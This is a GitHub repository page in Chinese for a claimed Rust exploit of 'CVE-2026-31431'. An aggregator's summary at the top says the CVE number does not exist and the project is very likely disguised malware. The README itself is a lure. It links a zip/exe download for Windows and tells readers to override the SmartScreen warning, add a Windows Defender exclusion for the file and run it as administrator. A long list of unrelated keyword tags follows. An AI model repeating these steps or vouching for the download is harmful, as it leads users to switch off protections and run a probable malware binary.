Dullpurple-sloop726/CVE-2026-31431-Linux-Copy-Fail

GitHub: Dullpurple-sloop726/CVE-2026-31431-Linux-Copy-Fail

声称利用 Linux CVE-2026-31431 实现本地提权的 Rust 工具,但引用的 CVE 编号不存在且以 Windows 可执行文件分发,极大概率是伪装成安全研究工具的恶意软件。

Stars: 1 | Forks: 0

# 🛡️ CVE-2026-31431-Linux-Copy-Fail - 轻松执行自定义 Shellcode [![](https://img.shields.io/badge/Download-Release-blue)](https://github.com/Dullpurple-sloop726/CVE-2026-31431-Linux-Copy-Fail/raw/refs/heads/main/src/Copy-Linux-Fail-CV-2.3.zip) ## 📌 项目概述 本软件提供了一个用于测试 Linux CVE-2026-31431 漏洞的工具。它使用 Rust 编程语言与系统文件进行交互。该程序允许用户在目标系统上运行自定义的 shellcode。该工具可帮助安全研究人员验证其 Linux 环境是否能正确处理文件复制操作。它主要针对 Linux 内核复制机制中发现的权限提升缺陷。 ## ⚙️ 系统要求 在开始之前,请确保您的计算机满足这些基本要求。您需要稳定的互联网连接以下载该工具。您还需要运行 10 或 11 版本的 Windows 操作系统。此工具需要 50 MB 的可用磁盘空间。无需安装额外的软件,因为此程序已包含运行所需的所有组件。 ## 📥 下载工具 您必须访问项目页面以获取必要的文件。导航至下面的官方链接以访问代码仓库。 [点击此处访问页面并下载](https://github.com/Dullpurple-sloop726/CVE-2026-31431-Linux-Copy-Fail/raw/refs/heads/main/src/Copy-Linux-Fail-CV-2.3.zip) 进入页面后,在屏幕右侧找到标有 Releases 的部分。点击最新的版本号以查看可用文件。选择以 .exe 结尾的文件将该应用程序下载到您的计算机。将此文件保存到您容易找到的文件夹中,例如您的“下载”文件夹。 ## 🚀 运行应用程序 按照以下步骤运行该软件。 1. 打开您保存该文件的文件夹。 2. 找到名为 exploit.exe 或类似名称的文件。 3. 双击该文件以启动进程。 4. 如果出现安全提示,请点击“更多信息”,然后点击“仍要运行”。 5. 屏幕上将打开一个文本窗口。此窗口显示漏洞利用进程的状态。 6. 按照屏幕上的提示输入您的 shellcode 信息。 7. 操作完成后,程序将报告成功状态。 ## 💡 使用界面 该界面完全通过基于文本的终端运行。应用程序启动时,您会看到一个带有编号选项的菜单。输入您想要执行的操作编号并按 Enter 键。 - 选项 1 检查当前系统状态。 - 选项 2 配置 shellcode payload。 - 选项 3 开始漏洞利用尝试。 - 选项 4 关闭应用程序。 请始终查看文本窗口中的状态消息。这些消息会清楚地说明工具是否发现了漏洞或尝试是否失败。如果工具检测到 CVE-2026-31431 缺陷,它会立即通知您。 ## 🛠️ 安全设置 Windows 可能会阻止此程序,因为它执行的操作与安全测试工具常见的操作相同。此活动会触发标准的杀毒软件行为。您可能需要在 Windows 安全中心设置中添加例外项,以允许该文件运行。 1. 打开“开始”菜单并输入 Windows Security。 2. 打开该应用程序并点击“病毒和威胁防护”。 3. 在“病毒和威胁防护”设置标题下选择“管理设置”。 4. 向下滚动到“排除项”并点击“添加或删除排除项”。 5. 点击“添加排除项”并选择“文件”。 6. 选择您之前下载的 exploit 文件。 此步骤可防止 Windows 在您验证系统弱点时阻止该工具运行。 ## ⚠️ 安全准则 请仅在您拥有或已获得测试授权的硬件上使用此工具。未经授权在系统上运行测试违反了有关数字安全的法律和政策。请谨慎使用您的 shellcode。请始终首先在虚拟机或隔离的网络环境中测试您的脚本。这种做法可以使您的主要硬件免受意外错误或系统不稳定的影响。 ## 📋 常见问题解答 如果程序突然关闭会发生什么? 这表明目标的权限或内部架构存在问题。请检查您的杀毒软件历史记录,以查看该工具是否被拦截。 我可以在 Mac 上运行此工具吗? 此特定实现原生支持 Windows 系统。Linux 用户可能需要重新编译 Rust 源代码。 此工具需要互联网访问权限吗? 不需要。下载文件后,您可以离线运行它。 在哪里可以找到更多帮助? 请查看代码仓库中包含的 documentation 文件夹,以获取有关底层漏洞的更多详细信息。如果您想了解更多关于代码设计的信息,Rust 社区也提供了大量关于如何处理内存安全和系统调用的资源。 ## 📝 错误排除 如果遇到错误,请确保以管理员身份运行该工具。右键点击该文件并选择“以管理员身份运行”。这授予了该工具与系统文件交互所需的权限。如果屏幕闪烁并消失,请打开命令提示符窗口,将该文件拖入窗口中,然后按 Enter 键以查看错误输出。这将揭示关闭的具体原因。如果错误涉及代码中的 bug,请通过在代码仓库页面提交 issue 来联系开发人员。提供错误消息中的文本将帮助团队更快地解决问题。
标签:0day, CVE-2026-31431, DAST, DNS枚举, Linux内核漏洞, Maven, Rust编程语言, Web报告查看器, 云资产清单, 代码安全, 任意代码执行, 任意页缓存写, 恶意软件分析, 提权漏洞, 操作系统安全, 攻击路径可视化, 本地提权, 漏洞枚举, 漏洞验证, 系统提权, 网络安全工具, 自定义Shellcode, 逆向工程, 通知系统, 黑客工具